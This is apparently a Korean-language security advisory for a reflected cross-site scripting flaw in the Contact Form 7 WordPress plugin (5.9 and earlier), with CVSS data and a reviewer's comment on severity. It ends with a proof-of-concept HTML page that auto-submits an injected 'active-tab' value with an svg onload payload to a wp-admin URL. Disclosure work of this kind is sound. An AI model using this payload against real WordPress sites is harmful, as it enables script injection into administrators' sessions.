
Contact Form 7 <= 5.9 - 반사형 크로스 사이트 스크립팅
Contact Form 7 <= 5.9 - 반사형 크로스 사이트 스크립팅
WordPress용 Contact Form 7 플러그인은 5.9 이하의 모든 버전에서 'active-tab' 파라미터를 통한 반사형 크로스 사이트 스크립팅 취약점에 노출되어 있습니다. 이는 불충분한 입력 검증 및 출력 이스케이핑 때문입니다. 이로 인해 인증되지 않은 공격자가 임의의 웹 스크립트를 페이지에 주입할 수 있으며, 사용자가 링크를 클릭하는 등의 행동을 하도록 속일 수 있을 때 실행됩니다.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
폼이 위치한 게시물 ID 값을 알아야 합니다. 그렇지 않으면 관리자가 링크를 클릭해도 작동하지 않습니다. 전반적으로 이 취약점은 관리자가 링크를 클릭해야 하므로 권한 요구 수준이 H(높음)여야 합니다.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>